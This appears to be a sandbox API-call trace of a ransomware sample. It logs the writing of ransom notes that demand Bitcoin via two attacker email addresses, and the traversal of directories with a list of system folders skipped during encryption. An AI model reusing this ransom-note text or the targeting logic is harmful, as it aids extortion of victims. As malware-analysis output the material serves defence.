	[0172.933] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0172.933] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0172.936] CloseHandle (hObject=0x388) returned 1
	[0172.937] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.937] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.938] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0172.939] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0172.939] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.939] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0172.940] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0172.940] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0172.940] CloseHandle (hObject=0x388) returned 1
	[0172.940] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.940] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.941] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0172.941] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0172.941] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.943] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0172.943] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0172.946] CloseHandle (hObject=0x388) returned 1
	[0172.946] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.997] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.998] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.998] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0172.999] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.999] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0172.999] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0173.000] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0173.000] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0173.000] CloseHandle (hObject=0x388) returned 1
	[0173.001] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80974282, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x809c073c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0173.001] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned 84
	[0173.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.001] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*") returned 0x54
	[0173.001] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.002] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="windows") returned 0x0
	[0173.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.002] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="boot") returned 0x0
	[0173.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.002] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="system volume information") returned 0x0
	[0173.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.002] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="temp") returned 0x0
	[0173.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="program files") returned 0x0
	[0173.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.003] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="appdata") returned 0x0
	[0173.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="application data") returned 0x0
	[0173.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="winnt") returned 0x0
	[0173.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="tmp") returned 0x0
	[0173.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="cache") returned 0x0
	[0173.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="webcache") returned 0x0
	[0173.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="inetcache") returned 0x0
	[0173.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="nvidia") returned 0x0
	[0173.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="packages") returned 0x0
	[0173.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="cookies") returned 0x0
	[0173.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*.*", lpSrch="programdata") returned 0x0
	[0173.007] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0173.007] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0173.007] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x80974282, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x809c073c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0173.008] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0173.008] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809290bc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x809290bc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x809290bc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x1f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0173.008] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809c073c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x809c073c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80a59257, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0173.008] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809c073c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x809c073c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x809c073c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0173.008] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80974282, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x80974282, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80974282, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0173.008] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0173.008] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0173.008] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0173.009] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}"
	[0173.009] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\"
	[0173.009] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov"
	[0173.009] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov"
	[0173.015] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\"
	[0173.015] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\"
	[0173.015] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*"
	[0173.015] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310064, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0173.016] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*") returned 89
	[0173.016] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0173.016] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*") returned 0x59
	[0173.016] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0173.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0173.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0173.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0173.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0173.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0173.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0173.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0173.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0173.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0173.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0173.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0173.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0173.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0173.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0173.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0173.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0173.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0173.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0173.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
